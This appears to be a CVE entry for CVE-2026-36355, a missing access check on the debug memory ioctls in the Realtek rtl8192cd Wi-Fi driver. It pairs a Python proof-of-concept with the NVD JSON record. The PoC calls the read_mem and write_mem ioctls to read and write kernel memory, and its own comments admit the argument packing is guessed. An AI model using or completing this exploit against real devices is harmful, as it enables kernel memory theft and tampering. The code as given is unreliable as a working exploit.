CVE-2026-36355

import fcntl import struct import os # Constants based on vulnerability description IOCTL_READ_MEM = 0x89F6 IOCTL_WRITE_MEM = 0x89F5 DEVICE_PATH = "/dev/rtl8192cd" # Path may vary depending on device def exploit_read(addr): """ PoC to read kernel memory using vulnerable IOCTL. """ try: # Open the device driver fd = os.open(DEVICE_PATH, os.O_RDWR) # Prepare data buffer (structure depends on specific driver implementation) # Assuming the driver takes an address and returns data # This is a generic PoC structure buf = bytearray(0x100) # Read 256 bytes # Send IOCTL command 0x89F6 (read_mem) # Note: Argument packing is hypothetical as exact struct wasn't provided fcntl.ioctl(fd, IOCTL_READ_MEM, struct.pack('I', addr)) print(f"[*] Attempting to read memory at: 0x{addr:x}") # In a real exploit, data would be parsed from the returned buffer os.close(fd) except Exception as e: print(f"[!] Exploit failed: {e}") def exploit_write(addr, data): """ PoC to write to kernel memory using vulnerable IOCTL. """ try: fd = os.open(DEVICE_PATH, os.O_RDWR) print(f"[*] Attempting to write to memory at: 0x{addr:x}") # Send IOCTL command 0x89F5 (write_mem) fcntl.ioctl(fd, IOCTL_WRITE_MEM, data) os.close(fd) except Exception as e: print(f"[!] Exploit failed: {e}") if __name__ == "__main__": print("[+] CVE-2026-36355 PoC: Realtek rtl819x Driver Missing Access Control") # Example target address (kernel text or data section) target_addr = 0xc0000000 exploit_read(target_addr)

{"cve": {"id": "CVE-2026-36355", "sourceIdentifier": "[email protected]", "published": "2026-05-05T14:16:08.737", "lastModified": "2026-05-07T15:53:49.717", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The rtl8192cd Wi-Fi kernel driver in the Realtek rtl819x Jungle SDK (all known versions through v3.4.14B) does not perform any access control checks on the write_mem (ioctl 0x89F5) and read_mem (ioctl 0x89F6) debug handlers, which are compiled into production builds via the unconditionally defined _IOCTL_DEBUG_CMD_ macro in 8192cd_cfg.h"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-782"}, {"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://realtek.com", "source": "[email protected]"}, {"url": "https://github.com/totekuh/CVE-2026-36355", "source": "[email protected]"}, {"url": "https://github.com/totekuh/CVE-2026-36355", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}